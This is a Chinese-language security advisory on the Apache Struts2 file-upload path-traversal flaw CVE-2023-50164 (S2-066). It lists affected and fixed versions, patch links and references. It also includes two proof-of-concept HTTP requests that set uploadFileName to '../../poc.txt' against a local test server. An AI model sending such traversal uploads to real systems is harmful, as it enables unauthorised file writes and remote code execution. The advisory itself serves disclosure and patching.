漏洞描述:
Apache Struts2是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Apache 发布了安全告警,Struts 2 开源Web应用程序框架中存在严重安全缺陷,该缺陷可导致远程代码执行。该漏洞编号为CVE-2023-50164,根源于有缺陷的“文件上传逻辑”,可能导致未经授权的路径遍历,并在被利用的上传恶意文件并实现任意代码的执行。
漏洞影响:
2.5.0 <= Struts <= 2.5.32
6.0.0 <= Struts <= 6.3.0
漏洞证明:
POC一:
——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name=”Upload”; filename=”poc.txt”
Content-Type: text/plain
test
——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name=”uploadFileName”;
../../poc.txt
——WebKitFormBoundary5WJ61X4PRwyYKlip–
POC二:
POST /s2_066_war_exploded/upload.action?uploadFileName=../../poc.txt HTTP/1.1
Host: localhost:8080
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundary5WJ61X4PRwyYKlip
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Length: 593
——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name=”Upload”; filename=”poc.txt”
Content-Type: text/plain
test
——WebKitFormBoundary5WJ61X4PRwyYKlip–
漏洞修复:
官方已有可更新版本,建议用户尽快更新到安全版本:
Struts >= 2.5.33
Struts >= 6.3.0.2
补丁:https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7
参考:
https://cwiki.apache.org/confluence/display/WW/S2-066
https://github.com/apache/struts/compare/STRUTS_6_3_0…STRUTS_6_3_0_2#files_bucket
https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7
https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)
https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-文件上传分析-S2-066/
原创文章,作者:首席安全官,如若转载,请注明出处:https://cncso.com/new-critical-rce-vulnerability-discovered-in-apache-struts2.html
